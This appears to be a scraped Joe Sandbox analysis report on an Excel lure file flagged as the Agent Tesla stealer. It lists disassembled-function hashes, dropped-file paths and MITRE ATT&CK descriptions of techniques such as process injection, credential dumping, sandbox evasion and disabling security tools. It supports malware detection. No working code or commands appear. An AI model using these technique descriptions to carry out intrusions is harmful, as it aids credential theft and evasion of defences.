Instruction Fuzzy Hash: E0113035F0061A9F8B51EBB8E94499E77F6FF8C6107108029E009D7754EB349D06CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 0062A6D0 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1173660963.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2902b863f4c58b2a3b6d583bd19c69c135f7c38af52223e094a937f72c2d5231
Instruction ID: 22a4bd102aa7d02fb1bba6581aec4e6060cbf6bd513cc054606ebe99147ce429
Opcode Fuzzy Hash: 2902b863f4c58b2a3b6d583bd19c69c135f7c38af52223e094a937f72c2d5231
Instruction Fuzzy Hash: AA116539F006199F8B51EBB8D94599EB7F6FF8C2107104029E009D7314EF349D068BD1

Uniqueness

Uniqueness Score: -1.00%

Function 0062E3D0 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1173660963.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7acb40f8a1c13a741d1ad96c7d2e3862f906438411dfa913ed109c0dc9f415f2
Instruction ID: f768ce415c35dc276db1367dd3e661c451b62028e534afd92fe611799233bb39
Opcode Fuzzy Hash: 7acb40f8a1c13a741d1ad96c7d2e3862f906438411dfa913ed109c0dc9f415f2
Instruction Fuzzy Hash: 8A113C35F005199F8B51EBB8D8449AE77F6FF8C2147108529E009EB314EB349D068BD1

Uniqueness

Uniqueness Score: -1.00%

Function 0062D3D8 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1173660963.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a07c68a7d8ffb2b8c12030524e57d521c219717a1c06c397f9f61f456196a5c
Instruction ID: d63ebbe3dd6367813d3931e60c0ea918e446901d357da737929b60a8653dad6e
Opcode Fuzzy Hash: 7a07c68a7d8ffb2b8c12030524e57d521c219717a1c06c397f9f61f456196a5c
Instruction Fuzzy Hash: 52113C35F005199F8B51EBB8D8559AE77F6EF8C6107108129E009EB314EB349D468B91

Uniqueness

Uniqueness Score: -1.00%

Function 0062C778 Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1173660963.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9d7b87ecef6f86046a3a48161fff7680c72b4feaa41342d82601e9dbb196c10e
Instruction ID: 8a216f7dedc08a84201ddc7c1be5ff5369d2801960e5989c69915afc5904fbf1
Opcode Fuzzy Hash: 9d7b87ecef6f86046a3a48161fff7680c72b4feaa41342d82601e9dbb196c10e
Instruction Fuzzy Hash: CD01B1B5E002198FCB50EFB8A8456DEB7F6EB88364B118126D419E7705E7305E078B91

Uniqueness

Uniqueness Score: -1.00%

Function 006602EB Relevance: .0, Instructions: 49COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1173751715.0000000000660000.00000040.00000800.00020000.00000000.sdmp, Offset: 00660000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_660000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 53ce0fda88ff1d89a3175845a9dfa1922cc7fc30dff51ccdb7e1b2bb708a5e4c
Instruction ID: 8f1d3e0f3ef5fd87b660b2afa5aec0059da909d86f73b31ae7df56f7c28b2c3d
Opcode Fuzzy Hash: 53ce0fda88ff1d89a3175845a9dfa1922cc7fc30dff51ccdb7e1b2bb708a5e4c
Instruction Fuzzy Hash: B0012831A00601CFC710BB79E54417DB7A3EFD8256F60887CD05AABB54EF3199698392

Uniqueness

Uniqueness Score: -1.00%

Function 00621058 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1173660963.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c9346041d70e37e75dc5709b9722c77a5edc9b26b577accf78228dc89c7f4d6
Instruction ID: 54419fe044eab9ddbfe55dcb226c564cc49883f45fa8d83c85c7d4b7e7b1bfa1
Opcode Fuzzy Hash: 7c9346041d70e37e75dc5709b9722c77a5edc9b26b577accf78228dc89c7f4d6
Instruction Fuzzy Hash: EEF0A772F002284F8B40BBB9A8086AF7AF5DFC8262B010137D509D7300EE348E41CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 0062A24F Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1173660963.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 814f3927a15684cc68146cbebdb837294d9a247a87f46c8655a7b6d0f2b18dcc
Instruction ID: 3ded0820f9def1a5a0a94a61a2b355ab29080996fd7d58361a867d7deadc5cad
Opcode Fuzzy Hash: 814f3927a15684cc68146cbebdb837294d9a247a87f46c8655a7b6d0f2b18dcc
Instruction Fuzzy Hash: D8E06D39B0001A8B8F05EBF9E9048DDB3F2BF882247108035D109DB764EF349C028BA2

Uniqueness

Uniqueness Score: -1.00%

Function 0062855F Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1173660963.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b64d461374ffa1bee339e533c4790f9d5168432bb20030d0beff6e9a270af24
Instruction ID: 08e379c059bddee7b425b59e85877b55ce02196f2c7aa4d78b0826c5a6956465
Opcode Fuzzy Hash: 5b64d461374ffa1bee339e533c4790f9d5168432bb20030d0beff6e9a270af24
Instruction Fuzzy Hash: CDE0ED39B000198F8F45EBF9E9558DDB3F2BF882297014065D109EB764DF349C528BA1

Uniqueness

Uniqueness Score: -1.00%

Function 0062E42F Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1173660963.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b7be427e18a323e3a635f52a94ffc59163fcda6f33d67d7ea8678c329f2fa6d1
Instruction ID: 8f3e330f11c7a3525f02329eb94dcc10ecbaa98bcb717021898a5718710bba11
Opcode Fuzzy Hash: b7be427e18a323e3a635f52a94ffc59163fcda6f33d67d7ea8678c329f2fa6d1
Instruction Fuzzy Hash: F0E0ED39B000198B8F45EBF9E8548DD73F2BF882657014035D509DB754EF349D568BA1

Uniqueness

Uniqueness Score: -1.00%

Function 0062A72F Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1173660963.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d4d60789d96aade0d21f00de1cc27350ffcfaf90b5ad3d3eb1405911c16359f
Instruction ID: 9eadd221c61e2ef575bd70462f470bafcbdfe09f9042c08ab63b447094d5eafc
Opcode Fuzzy Hash: 3d4d60789d96aade0d21f00de1cc27350ffcfaf90b5ad3d3eb1405911c16359f
Instruction Fuzzy Hash: 8AE06D39B000198B8F01EBF9E8148DDB3F2BF882257004025D109DB720EF349C028BA1

Uniqueness

Uniqueness Score: -1.00%

Function 0062D437 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1173660963.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 695a83000ebd49bdd2a7167d11222596fd6da566c27b0d84c10e43dbedccaa15
Instruction ID: 4ae65c08d6520fdccaa7fbe94eae0c3cee9ba14856957eada13689802307951e
Opcode Fuzzy Hash: 695a83000ebd49bdd2a7167d11222596fd6da566c27b0d84c10e43dbedccaa15
Instruction Fuzzy Hash: 23E0ED39B004199B8F45EBF9E8558DD73F2BF882657018025D109DB754DF349C568BA1

Uniqueness

Uniqueness Score: -1.00%

Function 00629EA7 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1173660963.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 163e2ad581eb10f26c0410f27609a7b76b7774f0e2a30b7b2b5e00b839693391
Instruction ID: f48ffc2c1026cd67c7e762117414f46fe55cbaeddbc1b9649b129ed53227755c
Opcode Fuzzy Hash: 163e2ad581eb10f26c0410f27609a7b76b7774f0e2a30b7b2b5e00b839693391
Instruction Fuzzy Hash: 52E0ED39B00019CB8F45EBF9E8548DD73F2BF882297018026D509DB764EF349C528BA1

Uniqueness

Uniqueness Score: -1.00%

Function 006272B7 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1173660963.0000000000620000.00000040.00000800.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_620000_Regasm_svchost.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb15f9c1f01ca479d403c13e7c8096b79943ff87dac9c9f1f8fd76d80696f759
Instruction ID: 50b07873787c51c2f3cfd000675b6e81f7f9cc4a3ec941d9c359290b2fad8e5d
Opcode Fuzzy Hash: bb15f9c1f01ca479d403c13e7c8096b79943ff87dac9c9f1f8fd76d80696f759
Instruction Fuzzy Hash: 06E0ED3AB000198B8F45EBF9E9548DDB3F2BF882257118026D509DB754EF349C169BA1

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Anti-virus, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Quotation - Optical Eyeglasses.xlsx

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Agenttesla

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

Exploits

Snort Signatures

Joe Sandbox Signatures

AV Detection

Exploits

Compliance

Software Vulnerabilities

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\mon[1].exe

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\109ABFC7.wmf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1797FF2.wmf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3A41A35E.wmf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3AB4071C.wmf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5E39D4D0.png

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6044B544.wmf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\67B5846D.wmf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\755CFE03.wmf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\85A0278A.wmf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9C0AAE91.png

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\9FBCD146.wmf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BB6E2A09.png

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C7CE848F.wmf

Windows Analysis Report
Quotation - Optical Eyeglasses.xlsx

Function 033F0517 Relevance: 6.1, APIs: 4, Instructions: 86
libraryCOMMON

Function 033F0491 Relevance: 4.6, APIs: 3, Instructions: 139
filenetworkCOMMON

Function 033F0531 Relevance: 4.6, APIs: 3, Instructions: 73
COMMON

Function 033F0588 Relevance: 4.5, APIs: 3, Instructions: 37
filenetworkCOMMON

Function 033F05B6 Relevance: 3.0, APIs: 2, Instructions: 50
COMMON

Function 033F05A1 Relevance: 3.0, APIs: 2, Instructions: 47
COMMON

Function 033F05DB Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Function 033F05E2 Relevance: .0, Instructions: 14
COMMON

Function 033F045C Relevance: 1.6, APIs: 1, Instructions: 75
COMMON

Function 00A40048 Relevance: 2.2, Strings: 1, Instructions: 983
COMMON

Function 001D7F47 Relevance: 3.9, Strings: 3, Instructions: 177
COMMON

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre